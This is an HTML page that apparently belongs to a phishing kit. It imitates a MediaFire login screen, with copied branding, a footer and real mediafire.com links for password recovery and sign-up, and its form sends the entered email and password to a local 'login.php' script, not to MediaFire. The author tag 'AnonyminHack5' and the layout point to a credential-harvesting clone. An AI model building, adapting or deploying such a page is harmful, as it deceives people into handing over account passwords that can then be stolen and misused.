<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"> <head> 
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-829541-1"></script>
    <title>Login or Sign up</title>
    <meta http equiv="X-UA-compatible" content="IE=edge"/>
<noscript>Sorry your browser does not support javascript, please enable it from your browser settings and continue</noscript>
<link rel="apple-touch-icon" sizes="180x180" href="favicon_io/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="favicon_io/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="favicon_io/favicon-16x16.png">
<link rel="manifest" href="favicon_io/site.webmanifest">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="author" content="AnonyminHack5">
<meta name="description" content="Login into mediafire account or sign up"/>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jgthms/minireset.css@master/minireset.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/picnic">
<link href="https://fonts.googleapis.com/css?family=Chivo:300,700|Playfair+Display:700i" rel="stylesheet">
<link rel="stylesheet" href="style.css"/>
<link rel="stylesheet" href="cookieconsent.min.css"/>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <!-- Add boot strap framrworks -->
  	<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css'>
<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css'><link rel="stylesheet" href="./style.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <!-- Add icon library -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="script.js"/>
  </head>
  <body>
  	<style>
  		body {
  		background: #fff;
  		color: black;
  		font-size: 15;
  		font-family: 'Chivo', sans-serif;
  		}		
.img-logo {
background-image: url('images/logo.png');
} 
.p-class {
color: black;
text-align: center;
font-size: 20px;
}
input {
border: solid;
outline: none;
color: black;
background: #fff;
font-size: 16px;
border-top-style: none;
border-left-style: none;
border-right-style: none;
border-bottom-style: 1px solid grey;
width: 290px;
height: 45px;
padding: 2px;
} 
input::placeholder {
color: black;
font-size: 16px;
font-family: 'Chivo', sans-serif;
} 
input:hover {
border: 2px solid blue;
outline: none;
border-top-style: none;
border-left-style: none;
border-right-style: none;
border-bottom-style: 2px solid blue;
} 
input::focus {
border: 2px solid blue;
outline: none;
border-top-style: none;
border-left-style: none;
border-right-style: none;
border-bottom-style: 2px solid blue;
} 
input[type=checkbox] {
width: 15px;
height: 15px;
 -webkit-appearance: checkbox;
     -moz-appearance: checkbox;
          appearance: checkbox;
} 
label {
font-size: 13px;
  color: #666;
  font-size: .875rem;
} 
.phase {
text-indent: 20%;
font-size: 13px;
color: blue;
float: right;
} 
a {
color: #55ACEE;
text-decoration: none;
text-indent: 1%;
} 
a:hover {
color: orange;
} 
input[type=submit] {
background: #55ACEE;
border: none;
border-radius: 3px;
color: #fff;
text-align: center;
padding: 4px;
margin: 2px;
width: 290px;
height: 48px;
font-family: 'Chivo', sans-serif;
} 
input[type=submit]:hover {
opacity: 0.4;
} 
</style>
<br/>
<br/>
<img class="img-logo" alt="Logo" src="images/logo.png"/>
	<br/>
	<br/>
<p class="p-class">
	How do you want to login? 
	</p>
<form action="login.php" method="post" onsubmit="return validateForm()">
	<br>
		<center>
	<input type="email" autocomplete="off" placeholder="Email address" name="login_email" id="email" required/>
	<br/>
	<br>
	<input type="password" maxlength="20" placeholder="Password" name="login_pass" required/>
	</center><br>
	  <input type="checkbox" value="lsRememberMe" id="rememberMe"> <label for="rememberMe">Keep me logged in</label><label for="checkbox" class="phase"><a href="https://mediafire.com/lost_password.php">Forgot password?</a></label>      
  <br><br>
  	<center>
  	<input type="submit" name="form_login" value="LOG IN" onclick="lsRememberMe()">
  	</form>
	  </center>
	<p align="center" color="grey";>_______________________________________</p>
		<link rel="stylesheet" href="style.css"/>
<center>
<div class="row">
		<div class="col four">
			<a href="https://www.facebook.com/login?" class="btn btn-facebook"><i class="fa fa-facebook"></i>  LOGIN WITH FACEBOOK</a>	
		</div>
</div>
<br>
<style>
	.img2-logo {
	width: 30px;
	height: 30px;
	}
	</style>
	<img class="img2-logo" src="images/twitter-bird-icon-png-logo-2.png" alt=""/><a href="https://twitter.com/login?">&nbsp;Log in with Twitter</a>
			<br>
			<br>
				<style>
					.div2-container {
					background: lightgrey;
					border: none;
					border-radius: 3px;
					color: black;
					font-size: 16px;
					text-align: center;
					font-family: 'Chivo', sans-serif;
					padding: 4px;
					width: 100%;
					height: 90px;
					}
					.footer-class {
					background: lightgrey;
					border: none;
					border-radius: 3px;
					color: grey;
					font-weight: bold;
					font-size: 14px;
					text-align: center;
					width: auto;
					height: auto;
					}
					</style>
					<br>
						<br>
				<div class="div2-container">
					<br>
					<div>Dont have an account?<br>
						<!--Break line oo-->
						<a href="https://www.mediafire.com">&nbsp;&nbsp;Create an account</a>
				    </div>
				</div>
				<br>
					<br>
						<br/>
						<br>
							<br>
				<footer class="footer-class">
					<br><br/>
						&copy2021 Mediafire &nbsp;&nbsp;Build 121821 <br>
							<br>
								Need help? <a href="https://www.mediafire.com/help/submit_a_ticket.php" target="_blank">Submit a ticket.</a>
								<br>
									<br>
				</footer>
				
				
				